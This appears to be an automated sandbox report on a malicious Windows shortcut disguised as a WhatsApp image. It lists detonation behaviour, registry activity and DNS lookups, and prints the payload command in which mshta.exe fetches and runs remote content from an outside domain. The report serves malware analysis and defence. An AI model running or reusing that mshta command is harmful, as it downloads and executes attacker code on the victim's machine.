Malware Analysis Report

2025-01-18 13:20

Sample ID 240613-dwjbvsseqf
Target WhatsApp_Image_2024-05-06.lnk
SHA256 683c61f8dda90ea3b1e76f2ff5ad78dc03ebe3827d56536988a9c5e4490eabd2
Tags
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

683c61f8dda90ea3b1e76f2ff5ad78dc03ebe3827d56536988a9c5e4490eabd2

Threat Level: Known bad

The file WhatsApp_Image_2024-05-06.lnk was found to be: Known bad.

Malicious Activity Summary


Checks computer location settings

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 03:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 03:21

Reported

2024-06-13 03:24

Platform

win7-20240508-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk

Signatures

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2156 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 2156 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 dipl.site udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 03:21

Reported

2024-06-13 03:24

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

152s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4988 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 dipl.site udp

Files

N/A